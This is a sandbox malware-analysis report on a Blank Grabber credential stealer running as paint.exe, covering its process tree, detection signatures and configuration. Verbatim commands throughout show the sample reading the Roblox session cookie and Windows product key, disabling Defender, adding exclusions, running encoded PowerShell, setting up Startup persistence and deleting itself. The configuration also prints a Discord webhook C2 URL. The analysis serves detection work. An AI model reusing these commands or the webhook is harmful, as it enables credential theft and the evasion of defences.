cmd.exe (PID: 9152 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7776 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8084 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1852 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5956 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 7908 cmdline: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8180 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8680 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8512 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8840 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8528 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8456 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8904 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8688 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8852 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7668 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 9052 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7544 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)

cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: paint.exe PID: 6716	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: paint.exe PID: 2132	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: paint.exe PID: 2132	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: paint.exe PID: 2132	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", ProcessId: 4588, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 3584, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", ProcessId: 5956, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Ping/Del Command Combination

Source: Process started

Author: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"", ProcessId: 9052, ProcessName: cmd.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

